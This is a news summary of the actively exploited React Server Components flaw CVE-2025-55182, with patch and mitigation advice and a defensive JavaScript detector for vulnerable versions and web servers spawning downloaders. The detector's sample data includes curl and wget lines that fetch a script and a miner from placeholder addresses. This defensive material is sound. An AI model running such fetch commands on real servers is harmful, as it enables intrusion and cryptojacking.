Particle.news

React2Shell Exploits Hit Crypto Sites as Wallet-Draining Attacks Spread

Researchers report that CVE-2025-55182 is being exploited to hijack servers and drain crypto wallets.

Overview

  • Security Alliance and Google Threat Intelligence Group say threat actors are weaponizing the React Server Components remote code execution flaw to run arbitrary code on exposed servers, intercept token permit signatures, and steal funds from crypto users.
  • CVE-2025-55182 allows unauthenticated remote code execution through a deserialization flaw in the RSC Flight protocol; a public PoC is circulating widely, and CISA has added the bug to its Known Exploited Vulnerabilities catalog.
  • Attackers include financially motivated groups deploying Monero miners and operations that researchers link to state-backed actors targeting cloud infrastructure on AWS and Alibaba Cloud.
  • React issued fixes in the react-server-dom packages at versions 19.0.1, 19.1.2, and 19.2.1; frameworks that bundle them, such as Next.js, need their own patched releases on each supported release line.
  • Exposure mapping using HTTP header fingerprints found 109,487 RSC-enabled assets in the U.S. Guidance urges patching followed by a rebuild and redeploy (the vulnerable code is compiled into the build output, so updating the dependency alone is not enough), limiting exposure of RSC endpoints, and monitoring for download tooling such as wget or cURL launched by web server processes.
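The patch-status, exposure-fingerprint and process-monitoring points above lend themselves to a few small checks a responder would script. The following is an added example, not code from the article, from React, from Next.js, or from any of the researchers cited. It assumes the three affected package names (react-server-dom-webpack, -parcel, -turbopack), uses the text/x-component content type as the RSC response fingerprint (the article does not say which header the exposure mapping keyed on), and treats a fixed set of process names as "web server" parents; the installed-package map and process events are constructed sample data.

```javascript
// Added example: three checks derived from the summary above. Not the
// article's, React's, Next.js's or any researcher's code. Package names,
// the text/x-component fingerprint and the web-server process list are
// assumptions made for this example.

const AFFECTED_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// First fixed release on each React 19 minor line, as stated in the summary.
const FIXED_BY_LINE = { "19.0": "19.0.1", "19.1": "19.1.2", "19.2": "19.2.1" };

// Parse "19.1.2" into [19, 1, 2]; prerelease suffixes are rejected on purpose
// because a canary may predate the fix on its line.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v.trim());
  return m ? [Number(m[1]), Number(m[2]), Number(m[3])] : null;
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Returns "patched", "vulnerable", "not-affected-package" or "unknown-line".
// Anything outside the three listed 19.x lines (18.x, canaries, future
// minors) is reported as unknown rather than silently treated as safe.
function checkPackage(name, version) {
  if (!AFFECTED_PACKAGES.has(name)) return "not-affected-package";
  const parsed = parseVersion(version);
  if (!parsed) return "unknown-line";
  const fixed = FIXED_BY_LINE[`${parsed[0]}.${parsed[1]}`];
  if (!fixed) return "unknown-line";
  return compareVersions(parsed, parseVersion(fixed)) >= 0 ? "patched" : "vulnerable";
}

// Walk a {name: version} map (as you would pull from a lockfile) and list
// entries that still sit below the fixed release on their line.
function findVulnerable(installed) {
  return Object.entries(installed)
    .filter(([name, version]) => checkPackage(name, version) === "vulnerable")
    .map(([name, version]) => `${name}@${version}`);
}

// Exposure fingerprint: RSC Flight payloads are served as text/x-component
// (assumption). Header names are matched case-insensitively.
function looksLikeRscResponse(headers) {
  const ct = Object.entries(headers).find(([k]) => k.toLowerCase() === "content-type");
  return !!ct && String(ct[1]).toLowerCase().startsWith("text/x-component");
}

// Post-exploitation monitoring: a web server process spawning wget or curl.
const WEB_SERVER_PROCS = new Set(["node", "next-server", "nginx", "httpd", "apache2"]);
const DOWNLOADERS = new Set(["wget", "curl"]);
const basename = (p) => p.split("/").pop();

// events: [{ ts, parent, cmd, args }] with parent/cmd as executable paths.
function flagWebServerSpawns(events) {
  return events.filter(
    (e) => WEB_SERVER_PROCS.has(basename(e.parent)) && DOWNLOADERS.has(basename(e.cmd))
  );
}

// Constructed sample data (not real telemetry; TEST-NET addresses).
const SAMPLE_INSTALLED = {
  react: "19.2.1",
  "react-server-dom-webpack": "19.2.0",
  "react-server-dom-turbopack": "19.1.2",
};
const SAMPLE_EVENTS = [
  { ts: "2025-12-05T10:01:02Z", parent: "/usr/bin/node", cmd: "/usr/bin/curl", args: "-s http://203.0.113.9/x.sh" },
  { ts: "2025-12-05T10:01:03Z", parent: "/bin/bash", cmd: "/usr/bin/curl", args: "https://registry.npmjs.org/" },
  { ts: "2025-12-05T10:01:04Z", parent: "/usr/bin/node", cmd: "/usr/bin/wget", args: "-qO- http://198.51.100.7/miner" },
  { ts: "2025-12-05T10:01:05Z", parent: "/usr/bin/node", cmd: "/usr/bin/sh", args: "-c ls" },
];

console.log("still vulnerable:", findVulnerable(SAMPLE_INSTALLED));
console.log("rsc fingerprint:", looksLikeRscResponse({ "Content-Type": "text/x-component" }));
console.log("suspicious spawns:", flagWebServerSpawns(SAMPLE_EVENTS).map((e) => e.ts));
```

Two design choices matter here. First, the version check refuses to call anything safe that is not on one of the three fixed lines, so an 18.x install or a canary build shows up as "unknown-line" for a human to look at rather than disappearing from the report. Second, the spawn check keys on the parent process, not just the child: curl from an operator's shell is routine, curl from the Node process serving your app is the signal the guidance describes.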